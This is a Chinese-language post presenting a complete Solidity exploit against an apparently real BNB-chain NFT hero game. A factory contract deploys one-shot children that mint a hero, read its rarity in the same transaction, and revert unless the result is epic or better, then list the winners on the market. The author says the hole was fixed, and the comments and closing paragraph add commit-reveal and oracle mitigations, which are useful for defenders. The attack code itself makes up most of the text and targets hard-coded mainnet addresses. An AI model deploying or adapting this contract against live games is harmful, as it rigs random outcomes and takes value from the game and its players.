一个很简单的游戏,随机抽卡 + 一个按钮打架的简单模式
先说明一下:这个漏洞已经被修复了。至于我的变量名为什么会写成这样——因为我喜欢。
利用合约
// SPDX-License-Identifier: GPL-3.0
pragma solidity >=0.7.0 <0.9.0;
import './Ownable.sol';
import './IERC20.sol';
/// @notice Minimal interface for the game contract that LetSGO's constructor calls to mint a hero.
/// @dev Only the one function used in this file is declared; the implementation is not shown here.
interface IBNBHero{
function createNewHero() external;
}
/// @notice Subset of the hero NFT contract's interface used by this file.
/// @dev getRarity is the call that exposes the mint outcome to the caller. The remaining
/// signatures look like the usual ERC-721 / ERC-721 Enumerable ones; the implementation is not
/// shown, so confirm against the deployed contract.
interface IBNBHCharacter{
function getRarity(uint256 _heroId) external view returns (uint256);
function tokenOfOwnerByIndex(address owner, uint256 index) external view returns (uint256 tokenId);
// approve and safeTransferFrom are declared but never called in this file.
function approve(address to, uint256 tokenId) external;
function setApprovalForAll(address operator, bool _approved) external;
function safeTransferFrom(address from,address to,uint256 tokenId) external ;
}
/// @notice Minimal interface for the marketplace contract on which LetSGO lists the minted hero.
/// @dev The unit of _price is not visible in this file.
interface IBNBHMarket{
function addListing(uint256 _id,uint256 _price) external;
}
/// @notice Callback interface that LetSGO's constructor invokes on its deployer (msg.sender).
/// @dev In this file the implementer is the PUSSY contract, which answers by transferring
/// tokens to an allow-listed caller.
interface IFUCK{
function ClaimTokenAndJerkOffFuckBitch1337() external;
}
/// @notice One-shot child contract deployed by PUSSY (same file). All of its work runs inside
/// the constructor, so a failed rarity check reverts the deployment together with every state
/// change made by the calls before it (token pull, approval, mint).
/// @dev Defensive reading: the mint result is readable through getRarity in the same transaction
/// that created it, which lets a contract caller keep only the outcomes it wants and revert the
/// rest. The game-side mitigation is to resolve the random outcome in a later transaction
/// (commit-reveal or an oracle callback) so that a caller cannot condition a revert on it.
/// For detection, the visible pattern is a freshly created contract that mints and reads rarity
/// inside its own constructor, with many reverted deployments from one factory.
contract LetSGO{
// Hard-coded account allowed to call emmergencyWithdraw13377 on this contract.
address public Owner = 0xec759d5fe395ffD698A0383A6A5CF1CAE8DEFA3d;
constructor(){
// Allow the game contract (same address as BNBH below) to spend 150 * 10**18 units of the
// token at 0xD256...f267 held by this contract. Presumably this is the mint fee token and it
// uses 18 decimals; confirm.
IERC20(0xD25631648E3Ad4863332319E8E0d6f2A8EC6f267).approve(0xde9fFb228C1789FEf3F08014498F2b16c57db855,150000000000000000000);
// Call back into the deployer; PUSSY's implementation transfers 43 * 10**18 token units to
// this contract, provided this address was allow-listed before deployment.
IFUCK(msg.sender).ClaimTokenAndJerkOffFuckBitch1337();
address BNBC = 0x6DA72F24c56197Dcf6B8920baCb183F6ccca8b01;
address BNBH = 0xde9fFb228C1789FEf3F08014498F2b16c57db855;
// Mint a hero to this contract.
IBNBHero(BNBH).createNewHero();
// This contract is new, so index 0 is expected to be the hero minted one line above.
uint256 HeroId = IBNBHCharacter(BNBC).tokenOfOwnerByIndex(address(this),0);
uint256 heroRA = IBNBHCharacter(BNBC).getRarity(HeroId);
// Outcome filter: any rarity below 4 reverts the constructor, which undoes the mint and the
// token transfer above. The accompanying text describes rarity >= 4 as epic or better.
require(heroRA >= 4,"HAHHHAH");
// Accepted outcome: authorise the marketplace for this contract's heroes and list the hero
// at price 300 (unit not visible in this file).
IBNBHCharacter(BNBC).setApprovalForAll(0x5CFFca0321b83dc873Bd2439aE7fEA10aE163fac,true);
IBNBHMarket(0x5CFFca0321b83dc873Bd2439aE7fEA10aE163fac).addListing(HeroId,300);
}
/// @notice Sends _amount of _token held by this contract to the caller; restricted to Owner.
/// @param _token ERC-20 token address.
/// @param _amount Amount in the token's smallest unit.
/// @return success Always true when the call does not revert.
function emmergencyWithdraw13377(address _token, uint _amount) external returns(bool success){
require(Owner == msg.sender);
require(IERC20(_token).balanceOf(address(this)) >= _amount, "not enough tokens in contract");
IERC20(_token).transfer(msg.sender, _amount);
return true;
}
}
/// @notice Factory and token holder for LetSGO children. It predicts each child's address,
/// allow-lists it, deploys the child, and funds it through the claim callback.
/// @dev Ownable is imported from ./Ownable.sol and is not shown here; onlyOwner presumably
/// restricts a function to the owner account (confirm against that file).
contract PUSSY is Ownable {
/// @notice Computes the address a CREATE from _origin at account nonce _nonce would produce,
/// i.e. the low-order 20 bytes of keccak256(rlp([_origin, _nonce])).
/// @dev The RLP encoding is written out by hand. The first byte is the list header
/// (0xc0 + payload length) and 0x94 is the string header for a 20-byte address (0x80 + 20).
/// @param _origin Address of the creating account.
/// @param _nonce Nonce of the creating account at creation time.
/// @return _address Predicted contract address.
function addressFrom(address _origin, uint256 _nonce) internal pure returns (address _address) {
bytes memory data;
// RLP encodes integer 0 as the empty string, 0x80.
if(_nonce == 0x00) data = abi.encodePacked(bytes1(0xd6), bytes1(0x94), _origin, bytes1(0x80));
// Values 0x01..0x7f are encoded as a single byte with no length prefix.
else if(_nonce <= 0x7f) data = abi.encodePacked(bytes1(0xd6), bytes1(0x94), _origin, uint8(_nonce));
// Larger values take a 0x80 + byte-count prefix followed by the big-endian bytes.
else if(_nonce <= 0xff) data = abi.encodePacked(bytes1(0xd7), bytes1(0x94), _origin, bytes1(0x81), uint8(_nonce));
else if(_nonce <= 0xffff) data = abi.encodePacked(bytes1(0xd8), bytes1(0x94), _origin, bytes1(0x82), uint16(_nonce));
else if(_nonce <= 0xffffff) data = abi.encodePacked(bytes1(0xd9), bytes1(0x94), _origin, bytes1(0x83), uint24(_nonce));
// NOTE(review): nonces above 0xffffffff are truncated by the uint32 cast, so the result is
// wrong for them.
else data = abi.encodePacked(bytes1(0xda), bytes1(0x94), _origin, bytes1(0x84), uint32(_nonce));
bytes32 hash = keccak256(data);
assembly {
// Round-trip the hash through scratch memory at offset 0 into the address return variable.
mstore(0, hash)
_address := mload(0)
}
}
// Allow-list of addresses permitted to call ClaimTokenAndJerkOffFuckBitch1337.
mapping(address => bool) public shuaige;
constructor(){
// The deployer is allow-listed as well.
shuaige[msg.sender] = true;
}
// Local mirror of this contract's CREATE nonce. Contract accounts start at nonce 1 (EIP-161),
// which matches the initial value here.
uint256 public nonce = 1;
/// @notice Deploys one LetSGO child; restricted by onlyOwner.
/// @dev The child's address is predicted and allow-listed before deployment because the child
/// calls back into this contract from its constructor. If the child's constructor reverts, `new`
/// reverts this whole call, so neither the allow-list entry nor the nonce increment persists.
function createNewHero() external onlyOwner{
address contractAddress = addressFrom(address(this),nonce);
shuaige[contractAddress] = true;
new LetSGO();
nonce += 1;
}
/// @notice Transfers 43 * 10**18 units of the token at 0xD256...f267 from this contract to the
/// caller; only allow-listed callers are accepted.
function ClaimTokenAndJerkOffFuckBitch1337() external{
require(shuaige[msg.sender] == true);
IERC20(0xD25631648E3Ad4863332319E8E0d6f2A8EC6f267).transfer(msg.sender,43000000000000000000);
}
/// @notice Sends _amount of _token held by this contract to the caller; restricted by onlyOwner.
/// @param _token ERC-20 token address.
/// @param _amount Amount in the token's smallest unit.
/// @return success Always true when the call does not revert.
function emmergencyWithdraw13377(address _token, uint _amount) external onlyOwner returns(bool success){
require(IERC20(_token).balanceOf(address(this)) >= _amount, "not enough tokens in contract");
IERC20(_token).transfer(msg.sender, _amount);
return true;
}
}
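首先,这次利用是失败的:项目方发现了漏洞,所以我放弃了这次利用。整个合约的思路很简单,就是利用交易回滚:没开到史诗以上的卡就让交易回滚,开到史诗以上的卡就提交到市场。问题的根源在于抽卡结果在同一笔交易内就能被调用方合约读取;从防御角度看,应当让随机结果在之后的交易中才揭晓(例如 commit-reveal 或预言机回调),这样调用方就无法根据结果选择性回滚。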